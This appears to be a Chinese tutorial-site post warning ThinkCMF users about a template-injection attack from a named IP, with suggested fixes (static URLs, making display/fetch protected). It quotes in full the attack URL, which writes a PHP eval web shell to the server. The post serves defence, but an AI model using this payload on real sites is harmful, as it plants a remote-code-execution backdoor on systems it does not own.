当前位置: 首页 > 软件教程 > 106.110.10.202 ip 请求写后门 ThinkCMF漏洞要小心

106.110.10.202 ip 请求写后门 ThinkCMF漏洞要小心

更新日期:2020-09-05 08:45:34

来源:互联网

浏览量:119


最近网站有一个ip地址是106.110.10.202往我的一个测试站注入内容,所以使用thinkphp的要注意了。小心写入不该写入的内容。


1.jpg

106.110.10.202 ip 请求写后门 ThinkCMF漏洞要小心

url代码为:

http://域名/index.php?a=fetch&templateFile=public/index&prefix=%27%27&content=<php>file_put_contents(%27vmi5fs.php%27,%27OK<?php%20@eval($_POST[%27q91%27]);?>%27)</php>

遇到这样的问题,你可能会想漏洞修复就完了呗,或者删除掉对应的代码就好了,其实你只是治标并不治本。回头还会有第二次、

第三次出问题。

那么遇见这类的问题怎么处理呢?

如果你的网站url是动态访问的,那么你的网站就有可能找到漏洞,被一些别有用心的人给利用了。即使是BAT也避免不了。

第一步是要采取静态或伪静态。

第二步,就是有漏洞修复漏洞。

漏洞修复建议

将 HomebaseController.class.php 和 AdminbaseController.class.php 类中 display 和 fetch 函数的修饰符改为 protected

提示:想了解更多106.110.10.202 ip 请求写后门 ThinkCMF漏洞要小心相关的内容,请尝试通过上方搜索框搜索。


相关资讯